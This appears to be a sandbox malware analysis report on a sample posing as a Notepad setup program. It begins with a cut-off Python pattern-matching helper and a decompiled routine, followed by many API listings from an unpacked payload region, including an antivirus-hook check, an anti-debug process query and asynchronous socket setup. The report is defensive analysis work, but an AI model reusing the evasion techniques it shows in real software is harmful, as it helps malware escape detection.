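    """Flag the two behaviours the listed calls add up to."""
    funcs = [c.func for c in calls]
    found = []
    nonblocking = any(c.func == "ioctlsocket" and c.args[1:2] == [FIONBIO] for c in calls)
    if nonblocking and {"CreateIoCompletionPort", "SetFileCompletionNotificationModes"} <= set(funcs):
        found.append("nonblocking_iocp_socket")     # async socket driven by a completion port
    for i, c in enumerate(calls):
        if c.func == "GetTokenInformation" and decode(c) == "TokenUser" and "LookupAccountSidW" in funcs[i + 1:]:
            found.append("token_user_lookup")       # resolve own SID to an account name
            break
    return found


if __name__ == "__main__":
    parsed = parse_calls(SAMPLE)
    for c in parsed:
        print(f"{c.ref:08X} {c.func}.{c.module}: {decode(c)}")
    print("patterns:", find_patterns(parsed))
```

Decoding from the value rather than from any printed label is deliberate: the constant, not the name beside it, is what the binary passes. FIONBIO followed by CreateIoCompletionPort and both skip flags set is the shape of an asynchronous socket loop rather than a one-off blocking connect, and it sits in the non-PE-backed 006E0000 region that carries the Yara matches, which is where the network code of the unpacked payload lives.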

                                      C-Code - Quality: 62%
                                      			E00409630(signed char* _a4, signed int _a8, signed int _a12, char** _a16) {
                                      				void* _v16;
                                      				signed char** _v32;
                                      				intOrPtr _v36;
                                      				signed char** _v40;
                                      				char _v56;
                                      				signed char** _t25;
                                      				void* _t31;
                                      				char* _t32;
                                      				signed int _t33;
                                      				intOrPtr _t34;
                                      				signed int _t36;
                                      				signed char* _t39;
                                      				signed char** _t41;
                                      				signed char** _t42;
                                      				char* _t44;
                                      				signed int _t46;
                                      				signed char* _t48;
                                      				char** _t49;
                                      				signed char** _t50;
                                      				intOrPtr* _t51;
                                      
                                      				// Instruction addresses from the report's side-by-side listing are kept as trailing comments.
                                      				_t49 = _a16;                                                    // 0x00409639
                                      				_t39 = _a4;                                                     // 0x0040963c
                                      				_t46 = _a8;                                                     // 0x0040963f
                                      				if(_t49 != 0 && (_t46 & 0x00000002) == 0) {                     // 0x00409644
                                      					_t49[3] = 0;                                                // 0x00409688
                                      				}
                                      				// The result structure is tagged with the "glob-1.0-mingw32" signature string; the
                                      				// comparison is by pointer, so an untagged structure is reset and tagged first.
                                      				if( *_t49 != "glob-1.0-mingw32") {                              // 0x00409654
                                      					E00408D40(_t49);                                            // 0x00409658
                                      					 *_t49 = "glob-1.0-mingw32";                                // 0x0040965d
                                      				}
                                      				 *_t50 = _t49;                                                  // 0x00409663
                                      				_t25 = E00408D90(_t39, _a12, _t46); // executed                 // 0x0040966d
                                      				_t41 = _t25;                                                    // 0x00409672
                                      				if(_t25 == 2) {                                                 // 0x00409677
                                      					if((_t46 & 0x00000010) == 0) {                              // 0x0040969b
                                      						goto L5;
                                      					}
                                      					_v40 = _t25;                                                // 0x0040969d
                                      					_v32 = _t50;                                                // 0x004096a0
                                      					 *_t50 = _t39;                                              // 0x004096a3
                                      					_t31 = E00408390(strlen(??) + 0x10 >> 4 << 4);              // 0x004096b4
                                      					_t42 = _v40;                                                // 0x004096b9
                                      					_t51 = _t50 - _t31;                                         // 0x004096bc
                                      					_t32 =  &_v56;                                              // 0x004096be
                                      					_v36 = _t32;                                                // 0x004096c2
                                      					_t44 = _t32;                                                // 0x004096c5
                                      					// Copy the pattern byte by byte into the local buffer; a 0x7f byte is an escape
                                      					// marker and is dropped, with the byte after it copied verbatim (see below the loop).
                                      					while(1) {                                                  // 0x004096dc
                                      						L10:
                                      						_t33 =  *_t39 & 0x000000ff;                             // 0x004096dc
                                      						_t15 =  &(_t39[1]); // 0x2                              // 0x004096df
                                      						_t48 = _t15;                                            // 0x004096df
                                      						if(_t33 == 0x7f) {                                      // 0x004096e4
                                      							break;
                                      						}
                                      						_t44 = _t44 + 1;                                        // 0x004096d0
                                      						_t39 = _t48;                                            // 0x004096d3
                                      						 *(_t44 - 1) = _t33;                                    // 0x004096d5
                                      						if(_t33 == 0) {                                         // 0x004096da
                                      							L12:
                                      							_t34 = _v36;                                        // 0x004096f7
                                      							_v40 = _t42;                                        // 0x004096fa
                                      							 *_t51 = _t34;                                      // 0x004096fd
                                      							L00408484();                                        // 0x00409700
                                      							_t41 = _v40;                                        // 0x00409708
                                      							if(_t34 != 0) {                                     // 0x0040970d
                                      								_v32 = _t41;                                    // 0x00409715
                                      								E00408C90(_t34, _t49);                          // 0x00409718
                                      								_t41 = _v32;                                    // 0x0040971d
                                      							}
                                      							goto L5;
                                      						}
                                      					}
                                      					// Escape seen: copy the following byte unconditionally and skip both.
                                      					_t36 = _t39[1] & 0x000000ff;                                // 0x004096e6
                                      					_t44 = _t44 + 1;                                            // 0x004096ea
                                      					_t39 =  &(_t39[2]);                                         // 0x004096ed
                                      					 *(_t44 - 1) = _t36;                                        // 0x004096f0
                                      					if(_t36 != 0) {                                             // 0x004096f5
                                      						goto L10;
                                      					}
                                      					goto L12;
                                      				} else {
                                      					L5:                                                         // 0x00409679
                                      					return _t41;                                                // 0x00409682
                                      				}
                                      			}

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: glob-1.0-mingw32
                                      • API String ID: 0-3253302226
                                      • Opcode ID: cec649cc26a9885d7be978dd14e3742b99c06c2a3be695d6a58628a145e5c2ae
                                      • Instruction ID: e3485a9147cbcf2fb15ffac92ca879753b65b567904ce85274ccf2315b4c24a6
                                      • Opcode Fuzzy Hash: cec649cc26a9885d7be978dd14e3742b99c06c2a3be695d6a58628a145e5c2ae
                                      • Instruction Fuzzy Hash: E521B171E053198BCB14DF6994416AEB7F5AF84304F18497FD881BB382DA7A9C01CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleA.KERNEL32(aswhook.dll), ref: 006EC8A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID: \GLOBAL??$aswhook.dll
                                      • API String ID: 4139908857-1337116160
                                      • Opcode ID: 420cea5b78d7db836c8791d37ab24c6f32396eddb8b0d02065c2592284e03c30
                                      • Instruction ID: 53429b815e66666da551f7bb4147a32c71492daaf57c63975544c4b10c2b52b1
                                      • Opcode Fuzzy Hash: 420cea5b78d7db836c8791d37ab24c6f32396eddb8b0d02065c2592284e03c30
                                      • Instruction Fuzzy Hash: 6EE0C231791309B7DB1087A19D03BFE36AEAB00B68F10446AB901F20C0DAF4DA409A25
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memmove.NTDLL(?,?,?,?,?,?,006E3C5D,?,?), ref: 006E63A8
                                      • malloc.MSVCRT ref: 006E63C4
                                      • memcpy.NTDLL(0000000C,?,?,?,006E3C5D,?,?), ref: 006E63E1
                                      • malloc.MSVCRT ref: 006E6401
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: malloc$memcpymemmove
                                      • String ID:
                                      • API String ID: 25407478-0
                                      • Opcode ID: 9b268af47d653a36f33a6e737737bbdb0741c61310c953627d5e8756ffea9dc5
                                      • Instruction ID: da4258da84df8f43d01272201d62c5048745c018aebeeb6bbf4e1bac43323cd2
                                      • Opcode Fuzzy Hash: 9b268af47d653a36f33a6e737737bbdb0741c61310c953627d5e8756ffea9dc5
                                      • Instruction Fuzzy Hash: 2C215776601B029FCB20CF6AC48489AF7E7EF98350725C92EE49A97640E730A805CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0d8fc265e05926a88b94d73af50bb72985b76bf8aa7005023fb3a98aa3eaeefe
                                      • Instruction ID: 63ff7465b006aff98f0f6a4f723aa2b25fd7b24bb46e3edb03bfd6b8df171079
                                      • Opcode Fuzzy Hash: 0d8fc265e05926a88b94d73af50bb72985b76bf8aa7005023fb3a98aa3eaeefe
                                      • Instruction Fuzzy Hash: 67417DB15002099FEB54CF25D881BB2B7AAFF05318F1485A9EE198F357DB71E801CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: ErrorFileFindLastNext_errno
                                      • String ID:
                                      • API String ID: 2804278807-0
                                      • Opcode ID: 04782325db604b174c9622ac62b7e70836297f19bbba73e6c6bfed7312207271
                                      • Instruction ID: a1022e6531552ade64d474ebf65b57f5a8f5eb5a00d102be54bb6ddfabf16913
                                      • Opcode Fuzzy Hash: 04782325db604b174c9622ac62b7e70836297f19bbba73e6c6bfed7312207271
                                      • Instruction Fuzzy Hash: 5C11CA711083914ADF509F29BC812A6B790EF41355F488877EC94DF387D53CC849C3A6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006E64D1: ??3@YAXPAX@Z.MSVCRT ref: 006E64E8
                                        • Part of subcall function 006E64D1: ??3@YAXPAX@Z.MSVCRT ref: 006E64FE
                                      • memcmp.NTDLL ref: 006E38F7
                                      • calloc.MSVCRT ref: 006E3907
                                      • memcpy.NTDLL(00000000,?,00000000), ref: 006E3925
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$callocmemcmpmemcpy
                                      • String ID:
                                      • API String ID: 3216597913-0
                                      • Opcode ID: 5f7093a6be423a83406d00363e40055e1ce63d68559d983d5d8cc19bc5635aa1
                                      • Instruction ID: 4f04cd2b2cec72a14d38e17af7678b2c13c77a6b984f576b92ccba4b985d14a8
                                      • Opcode Fuzzy Hash: 5f7093a6be423a83406d00363e40055e1ce63d68559d983d5d8cc19bc5635aa1
                                      • Instruction Fuzzy Hash: 8461CDB28063D49ACF21DBA1CC8DEEA77BFAF04310F54056AF54597282E731DA45CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • setsockopt.WS2_32(?,0000FFFF,00007010,00000000,00000000), ref: 006F139A
                                      • WSAGetLastError.WS2_32(?,006EF791,00000000,00000000,?,00000000,00000000,00000000,006EF60C,00000000,?,00000000,006E2DE3,?,00000000,?), ref: 006F13C2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastsetsockopt
                                      • String ID:
                                      • API String ID: 1729277954-0
                                      • Opcode ID: dcfddf23f4705b6a150ad8ab52c5f76e528a74516713e19e788cc97864dfbd0a
                                      • Instruction ID: 6db089ef4da11ed177d5738a3ed84ca9947c7dd66bbd802a3349ccdbad1692d1
                                      • Opcode Fuzzy Hash: dcfddf23f4705b6a150ad8ab52c5f76e528a74516713e19e788cc97864dfbd0a
                                      • Instruction Fuzzy Hash: 2B315E71604609EFDB20DF25C841E76B7B9FF0A7A4B008629FE5A9BB51C730F8158B94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memset
                                      • String ID: QAn
                                      • API String ID: 2221118986-3512184718
                                      • Opcode ID: 6196429a8755ee52fa887eef167a514ac7cf9366284b490a6dcdbf547cd1c2a6
                                      • Instruction ID: e42e07dc8688e566749855bc2bb71f6fb6ff4031f37ac0fd19d07225584d575d
                                      • Opcode Fuzzy Hash: 6196429a8755ee52fa887eef167a514ac7cf9366284b490a6dcdbf547cd1c2a6
                                      • Instruction Fuzzy Hash: BF21C671902359ABCF10CF66DC84AEF777AEB40324F104226F961A72C0D7749A59CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _errnorealloc
                                      • String ID:
                                      • API String ID: 3650671883-0
                                      • Opcode ID: f83c382b9c0e211f7473ffc2f123d40eebd65c7e53d05c29288505838aa9bfea
                                      • Instruction ID: 0fb9360118e1c37cb4c144194b2d3137b780c5e6dfd278c6b2ffd212d18ac402
                                      • Opcode Fuzzy Hash: f83c382b9c0e211f7473ffc2f123d40eebd65c7e53d05c29288505838aa9bfea
                                      • Instruction Fuzzy Hash: 53014BB2A0A3108BD760AF69BAC105EFBE4EF88750F455D3FF88457245C67588818B97
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • malloc.MSVCRT ref: 006E4054
                                        • Part of subcall function 006E4099: memset.NTDLL ref: 006E40B4
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E408C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@mallocmemset
                                      • String ID:
                                      • API String ID: 2973997714-0
                                      • Opcode ID: 3db1b51620bcd2d9b97ed57dfccbb188cd27e5c49220050bee32832bf56e1982
                                      • Instruction ID: f3596e04fa5941eb3f947f120a229cceab356ba1e3a7a5975cbb35c7d0438e93
                                      • Opcode Fuzzy Hash: 3db1b51620bcd2d9b97ed57dfccbb188cd27e5c49220050bee32832bf56e1982
                                      • Instruction Fuzzy Hash: EF0131765017069FC7149F7AD84489BB7EEEB88350314843EEB5AC7700FB31E9408B90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: f89bfc6596a7e76439bf99b8a0c06a625b2f5ea7c1229271ef8fb7566e23c761
                                      • Instruction ID: fee6394ebe54f2d206b503ebf084cf508a951ad1c931ad4ef100f5fd530863fe
                                      • Opcode Fuzzy Hash: f89bfc6596a7e76439bf99b8a0c06a625b2f5ea7c1229271ef8fb7566e23c761
                                      • Instruction Fuzzy Hash: C6F0A276201741DBC721CF4ED840A56B3EAEFD83A1725442DF594C7350D770E844CB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: malloc
                                      • String ID: MGn
                                      • API String ID: 2803490479-2452705820
                                      • Opcode ID: 2638b44a310262308b0a12379aad5a477196c57a5541af5157de4cd835011ba0
                                      • Instruction ID: f0dfcb775c5dbed32d71be015a31d33c64219eb64234a8ea0c0ab1db5545eeef
                                      • Opcode Fuzzy Hash: 2638b44a310262308b0a12379aad5a477196c57a5541af5157de4cd835011ba0
                                      • Instruction Fuzzy Hash: DCF0D4B56063499FDF098F65D8549AA3BA6FF48310B05806DFD098B761DB31E820DBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindClose.KERNEL32(?,?,?,?,?,00409440), ref: 00409FC5
                                        • Part of subcall function 00408660: free.MSVCRT ref: 0040867A
                                      • _errno.MSVCRT ref: 00409FE0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: CloseFind_errnofree
                                      • String ID:
                                      • API String ID: 1660445202-0
                                      • Opcode ID: 347ceb2ece9a33697517600c38b13913a8b214db0fff89bc9190d453dc0efc86
                                      • Instruction ID: 736b3ee0bdbcbf2267578ce17fac7c8a8ad3650b082484814c5fa3da888b4290
                                      • Opcode Fuzzy Hash: 347ceb2ece9a33697517600c38b13913a8b214db0fff89bc9190d453dc0efc86
                                      • Instruction Fuzzy Hash: F6E04FB05043028BC7003E75898261A36946B01354F450A7EEC90AB2C7EABC88508797
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006E7198: malloc.MSVCRT ref: 006E719E
                                        • Part of subcall function 006E7198: ??3@YAXPAX@Z.MSVCRT ref: 006E71B8
                                      • memcpy.NTDLL(-0000009C,?,00000000,?,?,?,-0000009C,?,006E48CC,00000000,?,?,?,?), ref: 006E7241
                                      • memcpy.NTDLL(-0000009C,?,00000000,?,?,?,-0000009C,?,006E48CC,00000000,?,?,?,?), ref: 006E7274
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcpy$??3@malloc
                                      • String ID:
                                      • API String ID: 2710600644-0
                                      • Opcode ID: 269610b1bbd20290d52c82c248a0f4e44d32cdce5011754fcab2252b03f67031
                                      • Instruction ID: 05ba40a02dd08cf6b5a35a231ab759468c0b3b9d9b904cb28df26839c8fa4919
                                      • Opcode Fuzzy Hash: 269610b1bbd20290d52c82c248a0f4e44d32cdce5011754fcab2252b03f67031
                                      • Instruction Fuzzy Hash: 9211987290534BAFCF40BE7ADC869AB3B6EEB11310B444015FE04DA147E661D65697A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _alloca_probe
                                      • String ID:
                                      • API String ID: 532146377-0
                                      • Opcode ID: a39a3edbc7a29cd53cd565786b7306b83048cb4d6fd7f5de49ba7eccdeb08855
                                      • Instruction ID: e74b4c703d7c4e4d367b5a385d863a93bf645f64ec6f9f685f3848ac0a87b513
                                      • Opcode Fuzzy Hash: a39a3edbc7a29cd53cd565786b7306b83048cb4d6fd7f5de49ba7eccdeb08855
                                      • Instruction Fuzzy Hash: 7E018072605309AFDB10DF5ACC819DAB7A9FF48350B148429ED5987301D730FE158BB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,006E4E1F,?,006F014D,?,006E4E1F,006E4E1F,006E745D,?,006E7461,006E7492,006E7445,?), ref: 006F0910
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateEvent
                                      • String ID:
                                      • API String ID: 2692171526-0
                                      • Opcode ID: 0f7bfff48c263af6a8cbbd9a160308d795af230f0c9aadb351ab2a8db281898a
                                      • Instruction ID: 59a90278bad331201becb07b9023074c1a281d290578da5ea64ec8f3f4b4f1b9
                                      • Opcode Fuzzy Hash: 0f7bfff48c263af6a8cbbd9a160308d795af230f0c9aadb351ab2a8db281898a
                                      • Instruction Fuzzy Hash: A90125746047099FFB20CE25D440AB3B7FAFB88364F009A1EE98686742E370F8418B50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006E5F12: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 006E5F21
                                        • Part of subcall function 006E5F12: GetProcAddress.KERNEL32(00000000,ZwQueryInformationProcess), ref: 006E5F2D
                                        • Part of subcall function 006E5F12: GetCurrentProcess.KERNEL32(00000022,00000000,00000004,?), ref: 006E5F45
                                        • Part of subcall function 006E5F12: NtQueryInformationProcess.NTDLL(00000000), ref: 006E5F4C
                                        • Part of subcall function 006E6320: memset.NTDLL ref: 006E6330
                                        • Part of subcall function 006E6320: memset.NTDLL ref: 006E6340
                                        • Part of subcall function 006E6320: memset.NTDLL ref: 006E634D
                                      • SetErrorMode.KERNELBASE(?), ref: 006E622D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memset$Process$AddressCurrentErrorHandleInformationModeModuleProcQuery
                                      • String ID:
                                      • API String ID: 2397146103-0
                                      • Opcode ID: 952ab5ca0205fbdd7372eff8853b130b831d467fc213ff1d4a97a0a84aab6f45
                                      • Instruction ID: 167e3a356b090d84d64d70ec0f129ddba433524907e3832e1e48c80ae65f408d
                                      • Opcode Fuzzy Hash: 952ab5ca0205fbdd7372eff8853b130b831d467fc213ff1d4a97a0a84aab6f45
                                      • Instruction Fuzzy Hash: D7F090721037913DAB8177A3DD0A9EF365E9E21384F000018FA0191143FFB59B4586F9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: c944721003f9882782ca8f6fbd9ce990e2b23a21e8fedf2c28e3d93991b73edc
                                      • Instruction ID: 04b59fe48fd5d6f40eaee490d4fb736bcd3afef6e5a0f62de5b56e8b56b72261
                                      • Opcode Fuzzy Hash: c944721003f9882782ca8f6fbd9ce990e2b23a21e8fedf2c28e3d93991b73edc
                                      • Instruction Fuzzy Hash: 16C012371081105F82409749FC0088A73ECEEC9521316005AF205D3120CA20BC428BB4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID:
                                      • API String ID: 471065373-0

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: atexit
                                      • String ID:
                                      • API String ID: 3413467201-0

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0

